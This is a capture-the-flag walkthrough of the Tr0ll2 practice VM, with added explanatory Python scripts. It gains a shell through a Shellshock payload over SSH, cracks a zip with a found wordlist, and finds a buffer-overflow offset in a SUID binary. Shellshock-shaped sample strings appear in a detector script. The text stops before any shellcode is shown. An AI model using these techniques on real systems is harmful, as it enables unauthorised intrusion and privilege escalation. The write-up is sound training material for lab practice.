“The next machine in the Tr0ll series of VMs. This one is a step up in difficulty from the original Tr0ll but the time required to solve is approximately the same, and make no mistake, trolls are still present! :) Difficulty is beginner++ to intermediate.” – Maleus
For more information and the OVA file download, check here.
Attacker & Target
Attacker: Kali Linux (10.10.10.131/24)
Target: TopHatSec: Freshly (10.10.10.141/24)
Vulnerability & Exploit
Hidden information found in a picture
Weak password used for FTP; logged in and downloaded a suspicious encrypted zip file
Cracked the zip file with the downloaded dictionary file and found user ‘noob’ and his SSH private key file
The Shellshock bug gives the attacker a way to break in
Buffer overflow analysis and exploit to get ROOT
Method
Scanned the network to discover the target server [netdiscover]
Port scanned the target to discover open ports and running services [nmap]
Scanned the web application to discover any web vulnerability [nikto]
Analysed robots.txt and wrote a script to check the folder list found in it
Gathered web information and interacted with the web server [firefox]
Downloaded the picture from four different folders and revealed the hidden information stored in one of the pictures
Found the hidden folder and downloaded a base64-encoded file from it; after decoding, it turned out to be a dictionary file
Tried weak passwords for FTP login and found one that works (Tr0ll / Tr0ll)
Downloaded the encrypted zip file through FTP and cracked it with the dictionary file found earlier [fcrackzip]
Exploited the Shellshock bug with noob’s private key file to break into the target machine
Looked around and found a suspicious program with the SUID bit set under the path ‘/nothing_to_see_here/choose_wisely/’
Analysed the program and worked out a PoC to exploit the BoF vulnerability in it to get ROOT
Tools
All the tools used here can be found in Kali Linux.
As usual, I used netdiscover to detect the target’s IP address (10.10.10.141 in this case).
10.10.10.141 is our Target!
Then I ran an nmap scan to detect open ports and running services on the target. From the result, TCP ports 21, 22 and 80 were discovered open, running on Ubuntu Linux.
nmap -sV -v -O -A -T5 -p- 10.10.10.141
Next, I ran a nikto scan on port 80 to check for any web vulnerability.
Nothing too exciting, but I noticed that robots.txt was found without any Disallow entries, which is odd. So I opened the Iceweasel browser to take a closer look at robots.txt.
Here I wrote a Python script to check all of the directories in robots.txt, filter out the working directories and save them to a file.
#!/usr/bin/python
# Check every directory listed in robots.txt against the web server and keep
# the ones that do not answer 404, so the picture in each can be fetched later.
import httplib

ip = '10.10.10.141'
img_name = 'cat_the_troll.jpg'

# read URIs found in robots.txt (one path per line)
f = open('robots.txt', 'r')
uri_list = f.readlines()
f.close()

uri_to_check = []
print '[*] Start checking ...'
for uri in uri_list:
    uri = uri.rstrip('\n')
    if not uri:
        continue
    conn = httplib.HTTPConnection(ip)
    conn.request('GET', uri + '/')
    response = conn.getresponse()
    conn.close()
    # filter error code 404 to make the result nice and tidy
    if response.status != 404:
        print '[+] ' + uri + '/'
        print '[-] ' + str(response.status)
        # if the response code is not 404 then put it in uri_to_check for further analysis
        uri_to_check.append('http://' + ip + uri + '/' + img_name)

# save the URIs under inspection to a file for further analysis
print '[*] Saving result to file: uris_to_check.txt'
f = open('uris_to_check.txt', 'w')
for uri in uri_to_check:
    f.write(uri + '\n')
f.close()
print '[*] Done!'
Four directories gave a 200 response code. Then I used wget with the -i switch to download the picture from each directory.
This file looks more like a dictionary file and will be useful later.
FTP & ZIP Crack
Now let’s move to FTP service.
root@kali:~# ftp 10.10.10.141
Connected to 10.10.10.141.
220 Welcome to Tr0ll FTP... Only noobs stay for a while...
Name (10.10.10.141:root): anonymous
331 Please specify the password.
Password:
530 Login incorrect.
Login failed.
ftp> bye
221 Goodbye.
I first tried to log in as the anonymous user but failed. After checking the MOTD message, I used Tr0ll / Tr0ll as the login credentials and logged in successfully.
root@kali:~# ftp 10.10.10.141
Connected to 10.10.10.141.
220 Welcome to Tr0ll FTP... Only noobs stay for a while...
Name (10.10.10.141:root): Tr0ll
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 1474 Oct 04 2014 lmao.zip
226 Directory send OK.
ftp> get lmao.zip
local: lmao.zip remote: lmao.zip
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for lmao.zip (1474 bytes).
226 Transfer complete.
1474 bytes received in 0.00 secs (5272.7 kB/s)
ftp> bye
221 Goodbye.
Here I found a zip file. After downloading it and trying to unzip lmao.zip, it asked for a password…
Next I tried to crack the zip password with the dictionary file found earlier.
fcrackzip found the password in seconds! Now I went into the lmao directory and found noob’s SSH key file.
SSH & Shellshock
First, I tried to SSH in with noob’s key file directly but failed. It looks like a forced command is configured for this key.
root@kali:~/tr0ll2/lmao# ssh -i noob noob@10.10.10.141
The authenticity of host '10.10.10.141 (10.10.10.141)' can't be established.
ECDSA key fingerprint is 91:b8:6a:45:be:41:fd:c8:14:b5:02:a0:66:7c:8c:96.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.10.141' (ECDSA) to the list of known hosts.
TRY HARDER LOL!
Connection to 10.10.10.141 closed.
By searching Google, I found that the Shellshock bug would help bypass this and get commands executed. For more details on exploiting SSH via the Shellshock vulnerability, check here and here.
So I tried the following command and it works!
root@kali:~/tr0ll2/lmao# ssh -i noob noob@10.10.10.141 '() { :;}; /bin/bash'
id
uid=1002(noob) gid=1002(noob) groups=1002(noob)
python -c "import pty; pty.spawn('/bin/bash')"
noob@Tr0ll2:~$ id
id
uid=1002(noob) gid=1002(noob) groups=1002(noob)
noob@Tr0ll2:~$ pwd
pwd
/home/noob
Now I have a shell on the target.
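Why the forced command did not help: sshd exports the client-supplied command as the SSH_ORIGINAL_COMMAND environment variable before it runs the forced command through the user's login shell, and a pre-patch bash imported any environment variable whose value begins with "() {" as a function definition and kept executing whatever followed the closing brace. The Python 3 script below is an added example (it is not from the original write-up) that covers the defender's side of this: it flags Shellshock-shaped values such as a ForcedCommand wrapper or log collector would see, and runs the widely published bash self-test. The sample commands are constructed, and the function and variable names are my own.

```python
#!/usr/bin/env python3
"""Flag Shellshock-shaped values and self-test the local bash for the original bug."""
import os
import re
import shutil
import subprocess

# Pre-patch bash treated a variable value starting with "() {" as an exported
# function; we match a little loosely (optional whitespace before the brace).
SHELLSHOCK_RE = re.compile(r"^\(\)\s*\{")


def is_shellshock_payload(value):
    """True if `value` has the function-definition prefix bash used to import."""
    return bool(SHELLSHOCK_RE.match(value))


def flag_suspicious(values):
    """Return the subset of `values` (e.g. SSH_ORIGINAL_COMMAND strings) that look like payloads."""
    return [v for v in values if is_shellshock_payload(v)]


def bash_is_vulnerable(bash=None):
    """Run the canonical self-test against a bash binary.

    A vulnerable bash prints 'vulnerable' because it executes the code trailing
    the function body while importing the variable x. Returns True/False, or
    None when no bash is available to test.
    """
    bash = bash or shutil.which("bash")
    if not bash:
        return None
    env = dict(os.environ, x="() { :;}; echo vulnerable")
    try:
        out = subprocess.run([bash, "-c", "echo probe"], env=env,
                             capture_output=True, text=True, timeout=10).stdout
    except (OSError, subprocess.SubprocessError):
        return None
    return "vulnerable" in out


# Constructed sample: values a ForcedCommand wrapper might receive in SSH_ORIGINAL_COMMAND.
SAMPLE_COMMANDS = [
    "ls -la",
    "() { :;}; /bin/bash",
    "() {  :; }; id",
    "scp -t /tmp",
]

if __name__ == "__main__":
    for cmd in flag_suspicious(SAMPLE_COMMANDS):
        print("[!] Shellshock-shaped command:", repr(cmd))
    print("[*] local bash vulnerable:", bash_is_vulnerable())
```

The self-test is the same one distributed when the bug was disclosed; on a patched bash only "probe" is printed, so the function returns False. The matcher is intentionally simple: the point is that a forced command is not a sandbox when the shell that runs it can be made to execute attacker-controlled environment data.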
Poking around the file system, I found three ‘door’ directories under /nothing_to_see_here/choose_wisely/. There is an r00t file in each door directory, and they change every couple of minutes.
noob@Tr0ll2:/nothing_to_see_here/choose_wisely$ ls -al *
ls -al *
door1:
total 16
drwsr-xr-x 2 root root 4096 Oct 4 2014 .
drwsr-xr-x 5 root root 4096 Oct 4 2014 ..
-rwsr-xr-x 1 root root 7271 Oct 4 2014 r00t
door2:
total 20
drwsr-xr-x 2 root root 4096 Oct 5 2014 .
drwsr-xr-x 5 root root 4096 Oct 4 2014 ..
-rwsr-xr-x 1 root root 8401 Oct 5 2014 r00t
door3:
total 16
drwsr-xr-x 2 root root 4096 Oct 5 2014 .
drwsr-xr-x 5 root root 4096 Oct 4 2014 ..
-rwsr-xr-x 1 root root 7273 Oct 5 2014 r00t
After some trial and error, I found that the r00t file with the biggest size is the target that is vulnerable to a buffer overflow.
noob@Tr0ll2:/nothing_to_see_here/choose_wisely/door1$ ./r00t $(python -c 'print "A" * 500')
Segmentation fault
Aha, a segmentation fault looks good so far. Then I uploaded the checksec.sh script to check the binary’s protections.
noob@Tr0ll2:/nothing_to_see_here/choose_wisely/door1$ ./checksec.sh --file r00t
RELRO           STACK CANARY      NX            PIE      RPATH      RUNPATH      FILE
Partial RELRO   No canary found   NX disabled   No PIE   No RPATH   No RUNPATH   r00t
Great, nearly no protection. Now it’s time to find the offset to EIP and overflow it.
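To see where the checksec.sh columns come from, here is an added Python 3 example (not the checksec.sh script and not from the write-up) that reads the ELF headers directly: NX is taken from the execute flag of the PT_GNU_STACK segment, PIE from the ELF type (ET_DYN), RELRO from the presence of a PT_GNU_RELRO segment (full RELRO additionally needs DT_BIND_NOW, which this minimal version does not check), and the stack canary from the presence of the __stack_chk_fail symbol name in the file. build_sample_elf constructs a tiny synthetic ELF image for the demonstration; its header values are chosen to mirror the r00t result above but are constructed, not taken from that binary.

```python
#!/usr/bin/env python3
"""Minimal checksec: report RELRO / canary / NX / PIE from ELF headers."""
import struct

PT_GNU_STACK = 0x6474E551   # program header describing stack permissions
PT_GNU_RELRO = 0x6474E552   # region made read-only after relocation
PF_X = 0x1                  # execute permission bit in p_flags
ET_EXEC, ET_DYN = 2, 3      # fixed-address executable vs. position-independent


def checksec(data):
    """Return a dict of mitigation findings for the ELF image in `data`."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    is64 = data[4] == 2                    # EI_CLASS: 1 = 32-bit, 2 = 64-bit
    endian = "<" if data[5] == 1 else ">"  # EI_DATA: 1 = little, 2 = big
    # e_type, e_machine, e_version, e_entry, e_phoff, e_shoff, e_flags, e_ehsize, e_phentsize, e_phnum
    fmt = "HHIQQQIHHH" if is64 else "HHIIIIIHHH"
    e_type, _, _, _, e_phoff, _, _, _, e_phentsize, e_phnum = struct.unpack_from(endian + fmt, data, 16)

    gnu_stack_flags = None
    has_relro = False
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        if is64:
            p_type, p_flags = struct.unpack_from(endian + "II", data, off)
        else:  # in Elf32_Phdr p_flags sits after the five 4-byte address/size fields
            p_type = struct.unpack_from(endian + "I", data, off)[0]
            p_flags = struct.unpack_from(endian + "I", data, off + 24)[0]
        if p_type == PT_GNU_STACK:
            gnu_stack_flags = p_flags
        elif p_type == PT_GNU_RELRO:
            has_relro = True

    # No PT_GNU_STACK at all means the loader falls back to an executable stack.
    nx = gnu_stack_flags is not None and not (gnu_stack_flags & PF_X)
    return {
        "relro": "Partial RELRO" if has_relro else "No RELRO",
        "canary": b"__stack_chk_fail" in data,
        "nx": nx,
        "pie": e_type == ET_DYN,
    }


def build_sample_elf(stack_flags=7, exec_type=ET_EXEC, with_relro=True, canary=False):
    """Construct a tiny, non-runnable 64-bit ELF image with the requested headers (example data)."""
    phdrs = [(PT_GNU_STACK, stack_flags)]
    if with_relro:
        phdrs.append((PT_GNU_RELRO, 4))
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8       # 64-bit, little-endian
    ehdr = ident + struct.pack("<HHIQQQIHHHHHH", exec_type, 62, 1, 0x400000,
                               64, 0, 0, 64, 56, len(phdrs), 64, 0, 0)
    body = b"".join(struct.pack("<IIQQQQQQ", t, f, 0, 0, 0, 0, 0, 0x10) for t, f in phdrs)
    if canary:
        body += b"__stack_chk_fail\x00"   # stands in for the dynamic string table entry
    return ehdr + body


if __name__ == "__main__":
    import sys
    path = sys.argv[1] if len(sys.argv) > 1 else None
    data = open(path, "rb").read() if path else build_sample_elf()
    print(checksec(data))
```

Run with a path to inspect a real binary, or without arguments to see the synthetic sample, which reports Partial RELRO, no canary, NX disabled and no PIE, the same picture checksec.sh gave for r00t.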
First, I used pattern_create.rb to generate a 500-byte unique pattern:
Then I used gdb on the target machine to track the value of EIP when the overflow happens.
noob@Tr0ll2:/nothing_to_see_here/choose_wisely/door1$ gdb -q ./r00t
gdb -q ./r00t
Reading symbols from /nothing_to_see_here/choose_wisely/door1/r00t...done.
(gdb) r Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq
Starting program: /nothing_to_see_here/choose_wisely/door1/r00t Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq
Program received signal SIGSEGV, Segmentation fault.
0x6a413969 in ?? ()
(gdb) i r esp
i r esp
esp 0xbffffab0 0xbffffab0
(gdb)
0x6a413969 is part of the pattern, and I used pattern_offset.rb to get the offset: 268. I also noted that the value of ESP is 0xbffffab0.
root@kali:~/tr0ll2# /usr/share/metasploit-framework/tools/pattern_offset.rb 0x6a413969
[*] Exact match at offset 268
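What pattern_create.rb and pattern_offset.rb are doing, as an added Python 3 re-implementation (not the Metasploit code and not from the write-up): build the Aa0Aa1… cyclic pattern and locate a crashed register value in it by converting the value to its little-endian byte order. It generalizes the page's single lookup to any pattern length and any 32-bit value; the function names are my own.

```python
#!/usr/bin/env python3
"""Metasploit-style cyclic pattern: generate it, and locate a register value in it."""
import string
import struct


def pattern_create(length):
    """Build the Aa0Aa1...Az9Ba0... pattern: upper, lower, digit, with the digit cycling fastest.

    Every 3-byte triplet is unique until the sets wrap after 26*26*10 triplets.
    """
    chunks, total = [], 0
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                total += 3
                if total >= length:
                    return "".join(chunks)[:length]
    raise ValueError("pattern longer than 20280 bytes would repeat triplets")


def pattern_offset(value, pattern):
    """Return the offset of `value` inside `pattern`, or None if absent.

    `value` may be a 32-bit int as shown by gdb (e.g. 0x6a413969); it is packed
    little-endian because that is how the bytes landed in EIP. A str is searched as-is.
    """
    if isinstance(value, int):
        needle = struct.pack("<I", value).decode("ascii", errors="replace")
    else:
        needle = value
    idx = pattern.find(needle)
    return idx if idx >= 0 else None


if __name__ == "__main__":
    pat = pattern_create(500)
    print(pat)
    print("[*] offset of 0x6a413969:", pattern_offset(0x6a413969, pat))
```

0x6a413969 packs to the bytes 69 39 41 6a, i.e. the text "i9Aj", which is the tail of the triplet "Ai9" followed by the start of "Aj0"; "Ai9" is triplet number 89 (8 letters times 10 digits, plus 9), so the "i" sits at byte 268, matching the pattern_offset.rb output above.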
Then I used Metasploit to generate shellcode that runs /bin/sh.